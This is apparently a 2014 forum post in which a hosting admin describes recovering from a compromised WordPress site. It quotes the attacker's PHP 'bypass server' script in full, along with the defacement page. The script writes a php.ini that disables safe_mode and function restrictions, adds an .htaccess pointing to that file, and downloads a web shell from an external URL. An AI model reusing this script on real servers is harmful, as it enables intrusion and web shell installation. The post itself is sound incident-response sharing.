Author Topic: Came across this in the wild  (Read 778 times)

0 Members and 1 Guest are viewing this topic.

Offline voodoo

  • Serf
  • *
  • Posts: 42
  • Cookies: 4
  • Try Harder
    • View Profile
    • Security Voodoo
Came across this in the wild
« on: July 15, 2014, 04:04:33 am »
Came across this in the wild today.  Someone exploited an out of date WordPress installation on a VM we were hosting for a customer.  Due to the sloppiness of escalation attempts it looks like the work of a true script kiddie.   ::)  the root web directory was left a total mess.  Although the defacement was successful (which was just replacing the index.php file) none of the other attempts succeeded and the attacker failed to break out of the VM or leverage any authority on the system.  Compressed the bad files and replaced the website and sql database with the backups, changed the ftp and sql passwords and *ta da* fixed.

The attempted php foo.
Code: [Select]
<?
/*
 * Title : Bypass Server [ Sfa7 Trick ]
 * Coder : Dr.KroOoZ
 * Home  : sec4ever.com
 * Greets To : b0x
 * Must Upload Like Here : /home/user/www/ | http://localhost.com/bypass.php
 * Password Shell is :  b374k
 */
# Mkdir
$dir = "mkdir";
$bb = $dir('ARGENTINA');
if($bb){
echo "[ARGENTINA] => Folder Create Complate !";
} else {
echo "[ARGENTINA] Error !";
}
# php.ini
$ARGENTINA = fopen('ARGENTINA/php.ini', 'w');
$sec = "safe_mode = OFF
disable_funtions = NONE";
fwrite($ARGENTINA ,$sec);
fclose($ARGENTINA);
if($ARGENTINA){
echo "<br>[php.ini] => Create Complate !";
} else {
echo "<br>[php.ini] Error !";
}
# .htaccess
$create = fopen("ARGENTINA/.htaccess", 'w');
$s3c = "suPHP_ConfigPath /home/".get_current_user()."/public_html/ARGENTINA/php.ini";
fwrite($create ,$s3c);
fclose($create);
if($create) {
echo "<br>[.htaccess] => Create Complate !";
} else {
echo "<br>[.htaccess] Error !";
}
# Shell
$b37 = 'http://site.com/';
$sh = file_get_contents($b37);
$open = fopen('ARGENTINA/krz.php', 'w');
fwrite($open,$sh);
fclose($open);
if($open) {
echo "<br>[ARGENTINA.php] => Shell Upload Complate !";
} else {
echo "<br>[ARGENTINA.php] => Error !";
}
?>%                               

The defacement
Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="Shortcut Icon" href="http://i.hizliresim.com/eoLDm9.png" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>HACKED BY AYYILDIZ TEAM INTERNATIONAL FORCE</title>
<style type="text/css">

body {
background-color: #000000;
background-image: url(http://i.hizliresim.com/jzPL2W.jpg);
background-size:100%; margin:0px;padding:0px;
min-width:650px;
  background-clip:box;
  background-origin:padding-box;
 background-repeat:no-repeat;
  background-position:center;
  background-attachment:fixed;}
.style14 {color: #FFFFFF; font-weight: bold; }
.style37 {
color: #F0F0F0;
font-weight: bold;
font-size: 10px;
}
.style38 {color: #9B0E0A}
.style40 {color: #600A0C; font-weight: bold; }
.style42 {
color: #333333;
font-weight: bold;
font-size: 14px;
}
.style43 {color: #D9120D}

</style>
</head>
<object type="application/x-shockwave-flash" width="17" height="17"data="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&autoplay=true"><param name="movie"value="http://www.uploadmusic.org/musicplayer.swf?song_url=http://www.uploadmusic.org/MUSIC/1425721404516369.mp3&song_title=uploadmusic.org&autoplay=true" /></object>

</body>
</html>

keep it simple